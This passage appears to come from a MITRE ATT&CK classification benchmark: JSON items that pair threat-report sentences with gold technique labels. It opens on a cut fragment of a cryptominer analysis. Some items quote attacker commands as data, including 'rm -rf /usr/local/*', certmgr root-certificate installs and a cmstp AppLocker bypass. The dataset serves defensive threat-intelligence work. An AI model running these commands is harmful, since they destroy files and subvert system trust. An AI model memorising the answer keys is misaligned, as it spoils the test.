cryptocurrency on a Tiny Core Linux virtual machine, making it cross platform. The admins of the site also frequently update the applications with newer versions, making it difficult to track the very first version of the miner. 2) Shell scripts used to launch the QEMU images. qemuservice shell script . After the dependencies are copied over, all miner-related daemons are launched and then the actual software is installed: - qemuservice won\u2019t launch the image if the Activity Monitor process is running. In fact, if it is running, it will unload the plist that it was launched by. Before installation, version 1 of the miner is removed along with executing the command: rm -rf /usr/local/* . As seen in the listing in Script 2, it only does so when it detects a running qemu-system-x86_64 process. Launching the Linux image . All versions use multiple shell scripts to launch the images. Version 1 executes the following binaries (copies of qemu-system-x86_64) to launch the QEMU images: qemu-system-x86_64, system-monitor, tools-service. All versions use the following switches: - -M accel=hvf to use the Hypervisor framework as an accelerator. There are, however, some hints that can help you to identify when an application contains unwanted code: - A trust popup from an unexpected, \u201cadditional\u201d installer (in this case the Oracle network adapter). - High CPU consumption by a process you did not install (QEMU or VirtualBox in this case). - A new service added to the startup services list (Windows) or a new Launch Daemon (macOS). - Network connections to curious domain names (such as system-update[.]info or system-check[.]services here). Indicators of Compromise (IoCs) . Hashes . macOS \u201ccracked\u201d applications (versions 1-3) . Windows \u201ccracked\u201d applications (version 4) . Linux images . Filenames . macOS . Windows . Hostnames . Download hosts (via HTTP on port 80) . Update hosts (via SCP) . Mining hosts . MITRE ATT&CK techniques . 20 Jun 2019 - 11:00AM . Sign up to receive an email update whenever a new article is published in our Ukraine Crisis \u2013 Digital Security Resource Center . Newsletter . Similar Articles . ESET Research . Watering hole deploys new macOS malware, DazzleSpy, in Asia . Virus Bulletin: Old malware never dies \u2013 it just gets more targeted . Anatomy of native IIS malware . Some URL shortener services distribute Android malware, including banking or SMS trojans . Discussion\n\t - T1569.001: System Services - Launchctl\n- Text: It moves the property list (plist) file com.dorusio.pkg.wallet.plist from the Installer package to the /Library/LaunchDaemons/ folder (Scheduled Task/Job: Launchd [T1053.004]). Because the LaunchDaemon will not run automatically after the plist file is moved, the postinstall script launches Dorusio_upgrade and runs it in the background (Create or Modify System Process: Launch Daemon [T1543.004\n\t - T1543.004: Create or Modify System Process - Launch Daemon\n", + "input": "Proton persists via Launch Agent.", + "gold": "- T1543.001: Create or Modify System Process - Launch Agent", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Lucifer can identify the IP and port numbers for all remote connections from the compromised host.\n\t - T1049: System Network Connections Discovery\n- Text: Mis-Type may create a file containing the results of the command \"cmd.exe /c net user {Username}\".\n\t - T1087.001: Account Discovery - Local Account\n- Text: SoreFang can enumerate domain accounts via \"net.exe user /domain\".\n\t - T1087.002: Account Discovery - Domain Account\n", + "input": "APT1 used the \"net use\" command to get a listing on network connections.", + "gold": "- T1049: System Network Connections Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Impacket contains various modules emulating other service execution tools such as PsExec.\n\t - T1569.002: System Services - Service Execution\n- Text: adds a new service named NetAdapter to establish persistence.\n\t - T1543.003: Create or Modify System Process - Windows Service\n- Text: Cobalt Group has used the command \"cmstp.exe /s /ns C:\\Users\\ADMINI~W\\AppData\\Local\\Temp\\XKNqbpzl.txt\" to bypass AppLocker and launch a malicious script.\n\t - T1218.003: System Binary Proxy Execution - CMSTP\n", + "input": "StrongPity can install a service to execute itself as a service.", + "gold": "- T1569.002: System Services - Service Execution", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: 68271df868f462c06e24a896a9494225,Office Monkeys LOL Video.zip Believe it or not, recipients in bulk run the file within: 95b3ec0a4e539efaa1faa3d4e25d51de,Office Monkeys (Short Flash Movie).exe This file in turn drops two executables to %temp%: 2aabd78ef11926d7b562fd0d91e68ad3, Monkeys.exe 3d3363598f87c78826c859077606e514, player.exe It first launches Monkeys.exe, playing a self-contained, very funny video of white-collar tie wearing chimpanzees working in a high rise office with a human colleague\n\t - T1036: Masquerading\n\t - T1125: Video Capture\n- Text: The UprotectData() method treats the first two bytes of the Base64 decoded value as a two-byte XOR key\n\t - T1573.001: Encrypted Channel - Symmetric Cryptography\n\t - T1560.003: Archive Collected Data - Archive via Custom Method\n- Text: POWRUNER can use base64 encoded C2 communications.\n\t - T1001: Data Obfuscation\n\t - T1132.001: Data Encoding - Standard Encoding\n", + "input": "FoggyWeb can masquerade the output of C2 commands as a fake, but legitimately formatted WebP file.", + "gold": "- T1036: Masquerading", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: USBStealer drops commands for a second victim onto a removable media drive inserted into the first victim, and commands are executed when the drive is inserted into the second victim.\n\t - T1092: Communication Through Removable Media\n- Text: Mustang Panda has used a customized PlugX variant which could spread through USB connections.\n\t - T1091: Replication Through Removable Media\n- Text: Mustang Panda has used a customized PlugX variant which could exfiltrate documents from air-gapped networks.\n\t - T1052.001: Exfiltration Over Physical Medium - Exfiltration over USB\n", + "input": "Part of APT28's operation involved using CHOPSTICK modules to copy itself to air-gapped machines and using files written to USB sticks to transfer data and command traffic.", + "gold": "- T1091: Replication Through Removable Media", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Honeybee adds collected files to a temp.zip file saved in the %temp% folder, then base64 encodes it and uploads it to control server.\n\t - T1074.001: Data Staged - Local Data Staging\n\t - T1560: Archive Collected Data\n- Text: Epic encrypts collected data using a public key framework before sending it over the C2 channel. Some variants encrypt the collected data with AES and encode it with base64 before transmitting it to the C2 server.\n\t - T1560: Archive Collected Data\n- Text: Figure 2: De-obfuscated code scheduling the second task to run a script embedded in a blog page The last section of script embedded in 29[.]html then downloads Revenge RAT and injects the binary into the memory of a running process, as seen in Figure 3\n\t - T1055: Process Injection\n", + "input": "NavRAT writes multiple outputs to a TMP file using the >> method.", + "gold": "- T1074.001: Data Staged - Local Data Staging", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: The executable dispci.exe appears to be derived from the code base of the legitimate utility DiskCryptor. It acts as the disk encryption module which also installs the modified bootloader and prevents the normal boot-up process of the infected machine.\n\t - T1561.002: Disk Wipe - Disk Structure Wipe\n- Text: In addition to the encrypted strings table, BitPaymer replaces the remaining strings in the binary with hashes and uses an algorithm to match these hashes with strings that exist on the host. This hash is combined with a DWORD using a simple XOR. This string hashing algorithm is identical to the hashing algorithm used in other Dridex modules\n\t - T1012: Query Registry\n- Text: RawDisk was used in Shamoon to write to protected system locations such as the MBR and disk partitions in an effort to destroy data.\n\t - T1485: Data Destruction\n", + "input": "Shamoon queries several Registry keys to identify hard disk partitions to overwrite.", + "gold": "- T1012: Query Registry", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Kimsuky has created social media accounts to monitor news and security trends as well as potential targets.\n\t - T1585.001: Establish Accounts - Social Media Accounts\n- Text: Leviathan has compromised social media accounts to conduct social engineering attacks.\n\t - T1586.001: Compromise Accounts - Social Media Accounts\n- Text: EXOTIC LILY has created e-mail accounts to spoof targeted organizations.\n\t - T1585.002: Establish Accounts - Email Accounts\n", + "input": "Leviathan has created new social media accounts for targeting efforts.", + "gold": "- T1585.001: Establish Accounts - Social Media Accounts", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: MacSpy uses Tor for command and control.\n\t - T1090.003: Proxy - Multi-hop Proxy\n- Text: The NOKKI malware itself has been updated in the short period of time it has been observed, moving from FTP to HTTP for C2 operations. The malware is modular in nature, and based on analysis of the information gathering module, it is highly likely the NOKKI operators are the same as the KONNI operators\n\t - T1071.001: Application Layer Protocol - Web Protocols\n\t - T1071.002: Application Layer Protocol - File Transfer Protocols\n- Text: Ngrok can tunnel RDP and other services securely over internet connections.\n\t - T1572: Protocol Tunneling\n", + "input": "Keydnap uses a copy of tor2web proxy for HTTPS communications.", + "gold": "- T1090.003: Proxy - Multi-hop Proxy", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: APT32 has used cmd.exe for execution.\n\t - T1059.003: Command and Scripting Interpreter - Windows Command Shell\n- Text: Exaramel for Linux has a command to execute a shell command on the system.\n\t - T1059.004: Command and Scripting Interpreter - Unix Shell\n- Text: The attackers orchestrate attacks using batch or PowerShell scripts that are executed, with the help of domain controllers, on any machine the DC can reach.\n\t - T1059: Command and Scripting Interpreter\n\t - T1064: Scripting\n", + "input": "DropBook can execute arbitrary shell commands on the victims' machines.", + "gold": "- T1059.003: Command and Scripting Interpreter - Windows Command Shell", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: MechaFlounder begins by entering a loop that will continuously attempt to communicate with its C2 server. The Trojan will use HTTP to send an outbound beacon to its C2 server that contains the user's account name and hostname in the URL. The code, seen in Figure 2, builds the URL by concatenating the username and hostname with two dashes \"--\" between the two strings. The code then creates the URL string by using the username and hostname string twice with the back-slash \"\\\" character between the two and by appending the string \"-sample.html\n\t - T1041: Exfiltration Over C2 Channel\n- Text: APT32's backdoor can exfiltrate data by encoding it in the subdomain field of DNS packets.\n\t - T1048.003: Exfiltration Over Alternative Protocol - Exfiltration Over Unencrypted Non-C2 Protocol\n- Text: FrameworkPOS can use DNS tunneling for exfiltration of credit card data.\n\t - T1048: Exfiltration Over Alternative Protocol\n", + "input": "Spark has exfiltrated data over the C2 channel.", + "gold": "- T1041: Exfiltration Over C2 Channel", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: SLOTHFULMEDIA has uploaded files and information from victim machines.\n\t - T1005: Data from Local System\n- Text: gathers information on users.\n\t - T1033: System Owner/User Discovery\n- Text: collects data from the clipboard.\n\t - T1115: Clipboard Data\n", + "input": "Gelsemium can collect data from a compromised host.", + "gold": "- T1005: Data from Local System", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: is capable of performing remote file transmission.\n\t - T1105: Ingress Tool Transfer\n- Text: Ragnar Locker has been delivered as an unsigned MSI package that was executed with \"msiexec.exe\".\n\t - T1218.007: System Binary Proxy Execution - Msiexec\n- Text: These PowerShell scripts are final stage payloads \u2013 they include a downloader with domain generation algorithm (DGA) functionality and the backdoor component, which connect to the C2 server to receive commands and perform additional malicious activities. hUpdateCheckers.ps1 (POWRUNER) The backdoor component, POWRUNER, is a PowerShell script that sends and receives commands to and from the C2 server\n\t - T1546.013: Event Triggered Execution - PowerShell Profile\n\t - T1059.001: Command and Scripting Interpreter - PowerShell\n", + "input": "WEBC2 can download and execute a file.", + "gold": "- T1105: Ingress Tool Transfer", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: uses a dropper called MaoCheng that harvests a stolen digital signature from Adobe Systems.\n\t - T1553.002: Subvert Trust Controls - Code Signing\n- Text: Lazarus Group has used code signing certificates issued by Sectigo RSA for some of its malware and tools.\n\t - T1588.003: Obtain Capabilities - Code Signing Certificates\n- Text: The malware sample contains some interesting static artifacts including self-signed digital certificates used to sign the executable purporting to be software from the Foxit Software Incorporated company based in California. It is not known why the actors picked this company -- and others listed in Table 1 below -- to impersonate but, as previously mentioned, their use of filenames and URLs makes their payloads appear benign and trustworthy\n\t - T1587.002: Develop Capabilities - Code Signing Certificates\n", + "input": "Suckfly has used stolen certificates to sign its malware.", + "gold": "- T1553.002: Subvert Trust Controls - Code Signing", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: RTM can add a certificate to the Windows store.\n\t - T1553.004: Subvert Trust Controls - Install Root Certificate\n- Text: For C0011, Transparent Tribe established SSL certificates on the typo-squatted domains the group registered.\n\t - T1587.003: Develop Capabilities - Digital Certificates\n- Text: Mimikatz's `CRYPTO` module can create and export various types of authentication certificates.\n\t - T1649: Steal or Forge Authentication Certificates\n", + "input": "Hikit uses \"certmgr.exe -add GlobalSign.cer -c -s -r localMachine Root\" and \"certmgr.exe -add GlobalSign.cer -c -s -r localMachineTrustedPublisher\" to install a self-generated certificate to the local trust store as a root CA and Trusted Publisher.", + "gold": "- T1553.004: Subvert Trust Controls - Install Root Certificate", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: APT41 leveraged sticky keys to establish persistence.\n\t - T1546.008: Event Triggered Execution - Accessibility Features\n- Text: Process injection helps the malware avoid detection; however, review of active network connections show notepad.exe communicating to 185\n\t - T1055: Process Injection\n- Text: OilRig has used a CHM payload to load and execute another malicious file once delivered to a victim.\n\t - T1218.001: System Binary Proxy Execution - Compiled HTML File\n", + "input": "APT41 used VMProtected binaries in multiple intrusions.", + "gold": "- T1027: Obfuscated Files or Information", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: If unable to contact the C2 server initially, the shellcode is configured to reattempt communication with the C2 server address in the following pattern: [a-z][a-z][a-z].stage.14919005.www1.proslr3[.]com VBScript #2 \u201cmshta.exe\u201d further executes the second VBScript \u201c58d2a83f777908.23270411.vbs\u201d, which creates a folder by GUID name inside \u201cIntel\u201d and drops the VBScript payloads and configuration files: \\Intel\\{BFF4219E-C7D1-2880-AE58-9C9CD9701C90}\\58d2a83f777638.60220156.ini \\Intel\\{BFF4219E-C7D1-2880-AE58-9C9CD9701C90}\\58d2a83f777688.78384945.ps1 \\Intel\\{BFF4219E-C7D1-2880-AE58-9C9CD9701C90}\\58d2a83f7776b5.64953395.txt \\Intel\\{BFF4219E-C7D1-2880-AE58-9C9CD9701C90}\\58d2a83f7776e0.72726761.vbs \\Intel\\{BFF4219E-C7D1-2880-AE58-9C9CD9701C90}\\58d2a83f777716.48248237.vbs \\Intel\\{BFF4219E-C7D1-2880-AE58-9C9CD9701C90}\\58d2a83f777788.86541308.vbs \\Intel\\{BFF4219E-C7D1-2880-AE58-9C9CD9701C90}\\Foxconn.lnk This script then executes \u201c58d2a83f777716.48248237.vbs\u201d, which is a variant of FIN7\u2019s HALFBAKED backdoor\n\t - T1036: Masquerading\n\t - T1064: Scripting\n- Text: RainyDay has used names to mimic legitimate software including \"vmtoolsd.exe\" to spoof Vmtools.\n\t - T1036.005: Masquerading - Match Legitimate Name or Location\n- Text: APT29 named tasks \"\\Microsoft\\Windows\\SoftwareProtectionPlatform\\EventCacheManager\" in order to appear legitimate.\n\t - T1036.004: Masquerading - Masquerade Task or Service\n", + "input": "During C0015, the threat actors named a binary file `compareForfor.jpg` to disguise it as a JPG file.", + "gold": "- T1036: Masquerading", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Remexi uses AutoIt and VBS scripts throughout its execution process.\n\t - T1059.005: Command and Scripting Interpreter - Visual Basic\n- Text: SpeakUp uses Python scripts.\n\t - T1059.006: Command and Scripting Interpreter - Python\n- Text: No matching sample found for T1546.016\n", + "input": "KeyBoy uses VBS scripts for installing files and performing execution.", + "gold": "- T1059.005: Command and Scripting Interpreter - Visual Basic", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: KONNI has bypassed UAC by performing token impersonation as well as an RPC-based method, this included bypassing UAC set to \u201cAlwaysNotify\".\n\t - T1548.002: Abuse Elevation Control Mechanism - Bypass User Account Control\n- Text: Ryuk has attempted to adjust its token privileges to have the \"SeDebugPrivilege\".\n\t - T1134: Access Token Manipulation\n- Text: KONNI has used parent PID spoofing to spawn a new `cmd` process using `CreateProcessW` and a handle to `Taskmgr.exe`.\n\t - T1134.004: Access Token Manipulation - Parent PID Spoofing\n", + "input": "Earth Lusca has used the Fodhelper UAC bypass technique to gain elevated privileges.", + "gold": "- T1548.002: Abuse Elevation Control Mechanism - Bypass User Account Control", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: TURNEDUP is capable of downloading additional files.\n\t - T1105: Ingress Tool Transfer\n- Text: five threads are for forwarding collected data to four cloud services (Box, Dropbox, Pcloud and Yandex). When uploading stolen data to a cloud service\n\t - T1102: Web Service\n- Text: has used mshta.exe to execute VBScript to execute malicious code on victim systems.\n\t - T1218.005: System Binary Proxy Execution - Mshta\n", + "input": "HEXANE has downloaded additional payloads and malicious scripts onto a compromised host.", + "gold": "- T1105: Ingress Tool Transfer", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Cobalt Strike can track key presses with a keylogger module.\n\t - T1056.001: Input Capture - Keylogging\n- Text: MacMa has the ability to record audio.\n\t - T1123: Audio Capture\n- Text: has been known to use credential dumping.\n\t - T1003: OS Credential Dumping\n", + "input": "Revenge RAT has a plugin for keylogging.", + "gold": "- T1056.001: Input Capture - Keylogging", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Cuba logs keystrokes via polling by using \"GetKeyState\" and \"VkKeyScan\" functions.\n\t - T1056.001: Input Capture - Keylogging\n- Text: Screenshot: takes system screenshots and saves them to %AppData% before sending them to the C2 via a POST request\n\t - T1113: Screen Capture\n- Text: When required by the attacker, it is capable of remotely activating the microphone on the compromised computer and capturing sounds. The audio recordings are encoded to MP3 format using a legitimate lame.dll library, which is downloaded and misused by the malware\n\t - T1123: Audio Capture\n", + "input": "InvisiMole can capture keystrokes on a compromised host.", + "gold": "- T1056.001: Input Capture - Keylogging", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Dridex's strings are obfuscated using RC4.\n\t - T1027: Obfuscated Files or Information\n- Text: Figure 26. Communication with the C&C server after the exchange of OS packet info Meanwhile, the runHandle method of the main backdoor loop will call for the requestServer method with the following backdoor commands (each command has one byte long code and is extracted by Packet::getCommand): Figure 27. The getCommand method The figure below shows the example of two of several possible command codes\n\t - T1140: Deobfuscate/Decode Files or Information\n\t - T1008: Fallback Channels\n- Text: The data found within this file is encrypted using a single-byte xor key of 0x41. The file header structure, with the underlying data still encrypted, can be seen below\n\t - T1560.003: Archive Collected Data - Archive via Custom Method\n", + "input": "Dust Storm has encoded payloads with a single-byte XOR, both skipping the key itself and zeroing in an attempt to avoid exposing the key.", + "gold": "- T1027: Obfuscated Files or Information", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: injects a DLL for into the explorer.exe process.\n\t - T1055: Process Injection\n- Text: KeyBoy uses the Dynamic Data Exchange (DDE) protocol to download remote payloads.\n\t - T1559.002: Inter-Process Communication - Dynamic Data Exchange\n- Text: SUNBURST used VBScripts to initiate the execution of payloads.\n\t - T1059.005: Command and Scripting Interpreter - Visual Basic\n", + "input": "Sharpshooter has leveraged embedded shellcode to inject a downloader into the memory of Word.", + "gold": "- T1055: Process Injection", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Bisonal has used commands and API calls to gather system information.\n\t - T1082: System Information Discovery\n- Text: HAFNIUM has interacted with Office 365 tenants to gather details regarding target's environments.\n\t - T1592.004: Gather Victim Host Information - Client Configurations\n- Text: EVILNUM can obtain the username from the victim's machine.\n\t - T1033: System Owner/User Discovery\n", + "input": "Kerrdown has the ability to determine if the compromised host is running a 32 or 64 bit OS architecture.", + "gold": "- T1082: System Information Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Hildegard has used masscan to search for kubelets and the kubelet API for additional running containers.\n\t - T1613: Container and Resource Discovery\n- Text: Conficker will copy itself with a random name into the system directory %systemroot%\\system32 and register itself as a service. The remote computer will then download the worm from the URL given and then start to infect other machines as well. Upon successful infection, it will also patch the hole to prevent other worms to infect the machine\" (Racicot\n\t - T1046: Network Service Discovery\n\t - T1112: Modify Registry\n- Text: Night Dragon has used compromised VPN accounts to gain access to victim systems.\n\t - T1078: Valid Accounts\n\t - T1133: External Remote Services\n", + "input": "Hildegard has used masscan to look for kubelets in the internal Kubernetes network.", + "gold": "- T1046: Network Service Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the 